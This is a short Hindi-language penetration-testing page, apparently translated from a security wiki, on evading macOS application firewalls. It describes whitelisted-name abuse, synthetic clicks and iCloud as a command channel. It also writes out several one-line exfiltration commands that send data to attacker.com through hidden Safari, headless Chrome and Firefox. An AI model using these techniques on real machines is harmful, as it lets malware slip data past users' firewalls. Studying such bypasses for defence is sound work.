पाए गए तकनीक

कुछ macOS फ़ायरवॉल ऐप्स में काम करने वाली निम्नलिखित तकनीकें मिलीं।

सफेद सूची नामों का दुरुपयोग

• उदाहरण के लिए मैलवेयर को launchd जैसे जाने-माने macOS प्रक्रियाओं के नाम से बुलाना

सिंथेटिक क्लिक

• यदि फ़ायरवॉल उपयोगकर्ता से अनुमति के लिए पूछता है तो मैलवेयर को अनुमति पर क्लिक करने के लिए

एप्पल द्वारा हस्ताक्षरित बाइनरी का उपयोग

• जैसे curl, लेकिन अन्य भी जैसे whois

जाने-माने एप्पल डोमेन

फ़ायरवॉल को जाने-माने एप्पल डोमेन्स जैसे apple.com या icloud.com पर कनेक्शन स्वीकृत कर रहा हो सकता है। और iCloud को C2 के रूप में उपयोग किया जा सकता है।

सामान्य छलकरना

फ़ायरवॉल को छलकरने के लिए कुछ विचार

स्वीकृत ट्रैफ़िक की जाँच करें

स्वीकृत ट्रैफ़िक का पता लगाना आपको संभावित व्हाइटलिस्टेड डोमेन्स या जिन एप्लिकेशन्स को उन डोमेन्स तक पहुंचने की अनुमति है, उन्हें पहचानने में मदद करेगा।

lsof -i TCP -sTCP:ESTABLISHED

DNS का दुरुपयोग

DNS निर्धारण mdnsreponder साइन की गई एप्लिकेशन के माध्यम से किया जाता है जिसे संभावित रूप से DNS सर्वरों से संपर्क करने की अनुमति दी जाएगी।

ब्राउज़र ऐप्स के माध्यम से

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• गूगल क्रोम

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• फ़ायरफ़ॉक्स

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• सफारी

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

द्वारा प्रक्रिया इंजेक्शन

यदि आप कोड को किसी प्रक्रिया में इंजेक्ट कर सकते हैं जिसे किसी सर्वर से कनेक्ट करने की अनुमति है, तो आप फ़ायरवॉल सुरक्षा को छल सकते हैं:

संदर्भ

• https://www.youtube.com/watch?v=UlT5KFTMn2k